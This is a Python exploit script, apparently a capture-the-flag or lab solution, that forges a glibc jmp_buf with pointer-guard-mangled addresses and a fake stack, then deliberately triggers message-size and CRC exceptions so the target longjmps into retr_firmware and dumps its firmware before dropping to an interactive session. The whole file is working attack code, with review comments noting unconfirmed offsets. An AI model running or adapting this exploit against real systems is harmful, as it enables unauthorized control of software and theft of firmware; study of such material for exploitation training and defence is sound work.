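from exploit_base import *  # noqa: F403 -- supplies leak, ptr_guard, exe_base, p64, p32, flat, bad_msg, menu, sendint, s

# Dump the firmware from the frontend by longjmp'ing into the middle of
# retr_firmware with a forged jmp_buf and a forged stack.
#
# Both the jmp_buf contents and the fake stack are delivered through the
# message buffer; a deliberate exception on the message-size check and then
# on the CRC check is what makes the target longjmp through our jmp_buf.

# Offsets into the leaked jmp_buf that receive mangled pointers.
# NOTE(review): which saved register each slot holds depends on where the
# jmp_buf sits inside `leak` and on the libc's jmp_buf layout -- confirm
# against the binary. Also confirm that `ptr_guard` already accounts for any
# rotation PTR_MANGLE applies on top of the XOR (glibc x86_64 also ROLs by
# 0x11); a plain XOR is only correct if the guard was derived that way.
JMPBUF_SLOT_A = 0x80  # receives RETR_FIRMWARE_MID
JMPBUF_SLOT_B = 0x90  # receives FAKE_STACK
RETR_FIRMWARE_MID = exe_base + 0x2da8  # in retr_firmware
FAKE_STACK = exe_base + 0x159e0  # presumably where the fake stack message lands -- TODO confirm

new_jmpbuf = bytearray(leak)
# Slice-assigning into a bytearray that is shorter than the target offset
# silently *inserts* (grows the buffer) instead of overwriting, which would
# shift the whole jmp_buf layout; fail loudly on a short leak instead.
if len(new_jmpbuf) < JMPBUF_SLOT_B + 8:
    raise ValueError(
        f"leaked jmp_buf too short: {len(new_jmpbuf):#x} bytes, "
        f"need at least {JMPBUF_SLOT_B + 8:#x}"
    )
new_jmpbuf[JMPBUF_SLOT_A:JMPBUF_SLOT_A + 8] = p64(ptr_guard ^ RETR_FIRMWARE_MID)
new_jmpbuf[JMPBUF_SLOT_B:JMPBUF_SLOT_B + 8] = p64(ptr_guard ^ FAKE_STACK)

# Fake stack that retr_firmware runs on after the longjmp. The fourth qword
# points 0x30 bytes into FAKE_STACK, i.e. back into this buffer if the
# message body is placed at FAKE_STACK -- TODO confirm that placement.
new_stack = flat([
    0, 0, 0,
    FAKE_STACK + 0x30,
    0, 0,
    # handle_exc
    p32(5) + p32(4),
])
# NOTE: bytes.ljust pads with b" " (0x20), not NUL bytes; kept as in the
# original since the tail is presumably don't-care -- verify if the target
# parses past the first 0x38 bytes.
new_stack = new_stack.ljust(256)

# Fill the message slots: nine throwaways, then the fake stack as the tenth.
for _ in range(9):
    bad_msg(b"a")
bad_msg(new_stack)

# Insert an extra message with an out-of-range size to throw the first
# exception (msg-size check).
menu("E")
menu("A")
sendint(999)

# Insert one more message that overlaps the jmp_buf; the CRC check throws,
# and the handler longjmps through our forged jmp_buf into retr_firmware.
bad_msg(new_jmpbuf)

s.recvuntil(b"Retrieving firmware ...\n")
s.interactive()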